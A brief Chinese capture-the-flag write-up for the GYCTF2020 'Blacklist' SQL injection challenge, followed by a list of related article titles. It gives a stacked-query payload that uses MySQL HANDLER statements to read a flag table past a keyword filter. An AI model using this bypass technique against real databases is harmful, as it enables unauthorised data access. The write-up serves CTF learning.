和强网杯的那到sql多了修改表名列名和预编译的过滤。
这题是新的姿势,官方文档。
该HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问。
这个表对象不被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭 。
构造payload
?inject=1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;
得到flag
相关文章
- 10-05[GYCTF2020]Ez_Express
- 10-05[GYCTF2020]Blacklist
- 10-05Buuctf-web-[GYCTF2020]Blacklist
- 10-05[GYCTF2020]Ez_Express
- 10-05[GYCTF2020]Blacklist
- 10-05[GYCTF2020]FlaskApp
- 10-05[GYCTF2020]Blacklist
- 10-05无列名注入_2 [GYCTF2020]Ezsqli 1
- 10-05[GYCTF2020]Blacklist
- 10-05[ACTF2020 新生赛]BackupFile && [ACTF2020 新生赛]Upload &&[GYCTF2020]Blacklist